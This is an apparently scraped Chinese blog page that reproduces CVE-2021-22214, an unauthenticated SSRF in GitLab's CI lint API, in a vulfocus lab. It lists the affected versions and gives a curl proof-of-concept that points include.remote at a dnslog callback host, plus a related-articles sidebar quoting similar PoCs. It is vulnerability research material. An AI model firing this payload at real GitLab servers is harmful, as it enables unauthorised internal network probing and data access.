(CVE-2021-22214)Gitlab SSRF漏洞 漏洞复现

最新推荐文章于 2025-04-27 19:22:40 发布
原创 最新推荐文章于 2025-04-27 19:22:40 发布 · 3.3k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了GitLab,它是基于Git的开源仓库管理Web服务。阐述了GitLab CI lint API存在的漏洞,远程攻击者可构造HTTP请求欺骗应用程序,获取敏感数据或发送恶意请求。给出了受影响版本,还说明了用vulfocus搭建测试环境及漏洞复现的情况。

简介
GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的Web服务。

漏洞描述
GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。Gitlab的CI lint API用于验证提供给gitlab ci的配置文件是否是yaml格式。而根据其说明文档文档,其include 操作支持remote选项,用于获取远端的yaml。因此在此处将remote参数设置为本地回环地址,同时由于后端会检查最后扩展名,加上?test.yaml 即可绕过。远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。

影响版本
13.10.5 > GitLab >= 10.5
13.11.5 > GitLab >= 13.11
13.12.2 > GitLab >= 13.12

测试环境
使用vulfocus进行镜像下载并启动

漏洞复现
POC为:
命令型

curl -k -s --show-error -H 'Content-Type: application/json' http://192.168.8.230:24365/api/v4/ci/lint --data '{ "include_merged_yaml": true, "content":"include:\n remote: http://7gmmkz.dnslog.cn/api/v1/targets/?test.yml"}'

数据包类型

POST /api/v4/ci/lint HTTP/1.1
Host: 192.168.8.230:36586
User-Agent: python-requests/2.25.0
Accept-Encoding: gzip, deflate
Accept:
最低0.47元/天 解锁文章
Gitlab SSRF 漏洞复现 CVE-2021-22214
afei001
08-03 1696
GitLab 是一个用于仓库管理系统的开源项目,使用 Git 作为代码管理工具,并在此基础上搭建起来的 Web服务。当对内部网络的webhook的请求被启用时,GitLab CE/EE中一个服务器端请求伪造漏洞SSRF(影响从10.5开始的所有版本)就有可能被未经身份验证的攻击者利用,即使是在注册受限的GitLab实例上。...
gitlab SSRFCVE-2021-22214
YouthBelief的博客
11-11 2389
gitlab SSRF CVE-2021-22214gitlab SSRFCVE-2021-22214)0x01 漏洞描述0x02 影响范围0x03 漏洞复现curl检测脚本检测0x04 漏洞修复 gitlab SSRFCVE-2021-22214) 0x01 漏洞描述 GitLab存在前台未授权SSRF漏洞。该漏洞源于对用户提供数据的验证不足,远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。 0x0
生命在于研究——CVE-2021-22214记录
易水哲的博客
09-28 744
GitLab存在前台未授权SSRF漏洞,未授权的攻击者也可以利用该漏洞执行SSRF攻击(CVE-2021-22214)。该漏洞源于对用户提供数据的验证不足,远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。
Gitlab SSRF(CVE-2021-22214)
m0_65150886的博客
02-02 695
当13.10.5 > GitLab >= 10.5、13.11.5 > GitLab >= 13.11、13.12.2 > GitLab >= 13.12时,远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。而根据其说明文档文档,其include操作支持remote选项,用于获取远端的yaml。GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。
追洞计划 | Gitlab CI Lint API未授权 SSRF漏洞(CVE-2021-22214)
Ms08067安全实验室
06-22 6652
文章来源|MS08067 Web安全知识星球本文作者:Taoing(Web安全攻防合伙人) GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来...
[CVE-2021-22214]Gitlab SSRF 未授权访问漏洞
whoami
04-13 3634
一、影响版本 13.10.5 > GitLab >= 10.5 13.11.5 > GitLab >= 13.11 13.12.2 > GitLab >= 13.12 二、漏洞POC curl -s --show-error -H 'Content-Type: application/json' http://127.0.0.1:55001/api/v4/ci/lint --data '{ "include_merged_yaml": true, "con
CVE-2019-8451(Jira未授权SSRF漏洞)
qq_41048303的博客
04-09 5022
CVE-2019-8451(Jira未授权SSRF漏洞) 1.漏洞概述 jira的/plugins/servlet/gadgets/makeRequest资源存在ssrf漏洞。 2.环境搭建 使用docker 进行搭建 docker pull cptactionhank/atlassian-jira:7.8.0 docker run --detach --publish 8080:8080 cptactionhank/atlassian-jira:7.8.0 访问ip:8080进行安装jira,安装过程需
CVE-2021-22214 Gitlab_SSRF
weixin_45945976的博客
12-15 2884
CVE-2021-22214 Gitlab_SSRF 漏洞复现: 目标地址:https://gitlab.xxx.xxx/users/sign_in POC curl -s --show-error -H 'Content-Type: application/json' https://gitlab.xxx.xxx/api/v4/ci/lint --data '{ "include_merged_yaml": true, "content": "include:\n remote: http://fbnw
CVE-2021-22214 Gitlab APl未授权SSRF复现
qq_48550824的博客
11-04 372
CVE-2021-22214 Gitlab API未授权SSRF复现 - 我有清茶与酒 - 博客园
GitLab任意文件读取漏洞(CVE-2020-10977)POC
01-15
检测脚本
Python-GitLab1147SSRF配合redis远程执行代码
08-10
GitLab 11.4.7 SSRF配合redis远程执行代码
gitlab-11.4.7远程代码执行漏洞及exp详细剖析教程
最新发布
2302_76944499的博客
04-27 651
出现了一个错误,说’get’命令的一些参数是错误的,这是有意义的,因为从前面的例子中,知道’get’命令如何在Redis中工作。然而,当点击创建一个新项目时,看到了多种导入项目的方法,其中一种是通过URL repo,它基本上会在你指定URL时获取repo。现在已经知道了Redis是什么,它在哪里被使用,以及如何使用CRLF注入添加新行,接下来可以为RCE创建payload。现在这个GitlabShellWorker被调用时带有一些参数,比如class_eval和需要执行的真正的命令,在例子中,如下所示。
Log4j2漏洞复现CVE-2021-44228)
热门推荐
qq_43798640的博客
12-15 3万+
Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。影响范围:Apache Log4j 2.x<=2.14.1。已知受影响的应用及组件,如 spring-boot-strater-log4...
Microsoft Exchange多个高危漏洞CVE-2021-26855/26857/26858/27065)
爱国小白帽
03-05 7076
\1. 通告信息 2021年03月04日,安识科技A-Team团队监测到微软官方发布了Microsoft Exchange安全更新,披露了包括CVE-2021-26855,CVE-2021-26857,CVE-2021-26858,CVE-2021-27065等多个高危漏洞。 \2. 漏洞概述 Microsoft Exchange Server 是个消息与协作系统。Exchange Server可以被用来构架应用于企业、学校的邮件系统或免费邮件系统。2021年03月03日微软官方披露多个Excha.
【POC公开】CVE-2021-31166:Windows HTTP协议远程代码执行漏洞通告
爱国小白帽
05-17 2875
报告编号:B6-2021-051702 报告来源:360CERT 报告作者:360CERT 更新日期:2021-05-17 1 漏洞简述 2021年05月17日,360CERT监测发现国外安全研究员发布了Windows HTTP协议远程代码执行漏洞的POC详情,漏洞编号为CVE-2021-31166,漏洞等级:严重,漏洞评分:9.8。 该漏洞在微软5月补丁日中完成了修复,微软官方将其标记为可造成蠕虫攻击及易被攻击,攻击者可以利用该漏洞造成大范围蠕虫攻击。 对此,360CERT建议广大用户及时将Windows
WebLogic CVE-2021-2211 XXE漏洞分析
爱国小白帽
04-21 1612
漏洞简述 2021年1月12日,墨云安全V-Lab实验室向Oracle官方报告了Weblogic Server XXE漏洞,2021年4月21日Oracle发布了致谢信息。 时间线 2021年1月12日向Oracle官方报告了此漏洞 2021年1月13日Oracle分配了issue编号 2021年1月25日Oracle确认在下一个补丁日修复此漏洞 2021年4月17日Oracle分配CVE编号CVE-2021-2211 2021年4月21日Oracle发布致谢信息 影响版本 10.3.6.0.0 1.
Git安全漏洞检查CVE-2021-21300
白天写代码,晚上追AI大模型,偶尔搞点八卦 开源动态|技术干货|实习机会|生态活动 我负责分享,你负责变强
03-16 2499
CVE-2021-21300 安全漏洞检查 本项目模拟一个利用CVE-2021-21300漏洞执行仓库内恶意脚本的行为,如果您的git客户端有 CVE-2021-21300 的安全漏洞,执行 git clone 本仓库时会输出以下内容 CVE-2021-21300 detected !!! Please update your git to fix the vulnerability CVE-2021-21300 影响分析 由于对 symbolic links 处理的问题,导致在不区分大小写的文件系统例
CVE-2020-2021:SAML身份验证机制绕过漏洞通告
爱国小白帽
06-30 3779
CVE-2020-2021:SAML身份验证机制绕过漏洞通告 360-CERT [三六零CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年06月30日, 360CERT监测发现Palo Alto官方发布了SAML身份验证机制绕过的风险通告,该漏洞编号为CVE-2020-2021漏洞等级:高危。 安全声明标记语言(SAML)是用于根据用户在另一上下文中的会话将其登录到当前应用程序中的标准。 SAML身份验证机制存在身份验证绕过的威胁。当SAML开启,同时Vali
Gitlab 任意文件读取漏洞CVE-2016-9086)以及gitlab SSRF to redis
公众号shadow sock7
12-16 1380
使用vulhub的环境: https://github.com/vulhub/vulhub/tree/master/gitlab/CVE-2016-9086 任意文件读取漏洞(CVE-2016-9086): GitLab CE/EEversions 8.9, 8.10, 8.11, 8.12, and 8.13 任意用户authentication_token泄露漏洞Gitlab CE/EE versions 8.10.3-8.10.5 docker起来之后是这样: 新建项目的时候有一个从Gitl
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值